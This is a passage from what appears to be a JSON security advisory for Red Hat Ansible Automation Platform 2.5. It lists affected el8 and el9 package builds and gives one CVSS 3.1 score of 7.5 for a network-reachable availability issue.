"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el8ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el9ap.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el8ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le",
